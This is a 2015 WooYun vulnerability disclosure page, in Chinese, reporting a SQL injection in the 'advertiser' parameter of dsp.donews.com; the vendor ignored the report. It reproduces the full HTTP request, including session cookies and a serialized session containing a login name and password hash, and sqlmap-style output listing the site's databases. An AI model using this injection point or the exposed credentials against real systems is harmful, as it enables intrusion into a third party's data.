当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136378

漏洞标题:Donews斗牛士某重要站点站DBA注入

相关厂商:Donews斗牛士

漏洞作者: 路人甲

提交时间:2015-08-23 23:02

修复时间:2015-08-28 23:04

公开时间:2015-08-28 23:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-23: 细节已通知厂商并且等待厂商处理中
2015-08-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

dba注入

详细说明:

5.jpg


POST /advertiser/ajax_page/0 HTTP/1.1
Host: dsp.donews.com
Content-Length: 35
Accept: */*
Origin: http://dsp.donews.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/44.0.2403.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://dsp.donews.com/advertiser/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=2794665984; pgv_si=s7874044928;
BAIDU_DUP_lcr=http://www.wooyun.org/corps/page/40;
Hm_lvt_7cb6c297efb61b417d1027283fcccdb6=1440324052,1440324296,1440332101;
Hm_lpvt_7cb6c297efb61b417d1027283fcccdb6=1440332883;
PHPSESSID=o8c9eo5fsnc5jg4p86urha8rt4; ci_session=a%3A10%3A%7Bs%3A10%3A%22session_id
%22%3Bs%3A32%3A%221cda0480c2e44fbdf9543b25b7990bf7%22%3Bs%3A10%3A%22ip_address%22%3Bs
%3A11%3A%221.25.28.101%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A110%3A%22Mozilla%2F5.0+
%28Windows+NT+10.0%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome
%2F44.0.2403.107+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi
%3A1440333557%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22login_name
%22%3Bs%3A6%3A%22yxtest%22%3Bs%3A8%3A%22password%22%3Bs%3A32%3A
%22860b1d6552a8ed6d71c35b6de6ae0596%22%3Bs%3A7%3A%22dsp_uid%22%3Bs%3A2%3A%2221%22%3Bs
%3A9%3A%22flow_type%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22jzw%22%3Bs%3A0%3A%22%22%3B
%7D529c7a7b4cd65d09cec2f6374df8a737d8c8615f
sed=&adv_category_id=0&advertiser=1


参数advertise克注入!

1.jpg


2.jpg


available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] rtb


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-28 23:04

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无